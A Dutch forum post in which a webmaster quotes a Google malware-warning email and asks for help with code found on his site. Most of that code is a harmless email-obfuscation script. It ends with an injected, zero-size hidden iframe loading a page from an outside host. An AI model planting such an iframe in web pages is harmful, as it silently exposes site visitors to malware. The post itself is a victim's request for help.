Ik kreeg vanmorgen de volgende mail van Google:
We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below is an example URL on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):
http://www.doing-graphics .nl/
Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//www.doing-graphics.nl/
We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser
If your site was compromised, it's important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security
Once you've secured your site, you can request that the warning be
removed by visiting http://www.stopbadware.org/home/review and
requesting a review. StopBadware and Google will jointly investigate
and reply to you with our findings. If your site is no longer harmful
to users, we will remove the warning.
Sincerely,
Google Search Quality Team
Nu heb ik mijn site bekijken en de index.html pagina had een wijzigingsdatum die niet kan kloppen, want toen was ik met vakantie. Ik heb het volgende stuk (door een onbekende toegevoegde) code ontdekt:
[news]
//<![CDATA[
var _rwObsfuscatedHref0 = "mai";var _rwObsfuscatedHref1 = "lto";
var _rwObsfuscatedHref2 = ":in";var _rwObsfuscatedHref3 = "gri";var _rwObsfuscatedHref4 = "d@d";
var _rwObsfuscatedHref5 = "oin";var _rwObsfuscatedHref6 = "g-g";
var _rwObsfuscatedHref7 = "rap";var _rwObsfuscatedHref8 = "hic";
var _rwObsfuscatedHref9 = "s.n";var _rwObsfuscatedHref10 = "l";
var _rwObsfuscatedHref = _rwObsfuscatedHref0+_rwObsfuscatedHref1+_rwObsfuscatedHref2+_rwObsfuscatedHref3
+_rwObsfuscatedHref4+_rwObsfuscatedHref5+_rwObsfuscatedHref6+_rwObsfuscatedHref7
+_rwObsfuscatedHref8+_rwObsfuscatedHref9+_rwObsfuscatedHref10; document.getElementById('rw_email_contact').href = _rwObsfuscatedHref;
//]]>
</script></p>
</div><!-- End Footer -->
</div><!-- End content -->
</div><!-- End main content wrapper -->
</div><!-- End container -->
</body>
</html>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
[/news]
(bericht iets opgeschoond door Moderator om forum layout niet in de war te schoppen)
Mijn vraag is:
1. wat doet dit?
2. hoe kan dit? De site is gemaakt met RapidWeaver.
3. welke akties moet ik ondernemen?
Dit gaat echt mijn petje te boven. Hoe kan iemand nou in mijn index.html iets wijzigen?
Jullie hulp wordt bijzonder op prijs gesteld.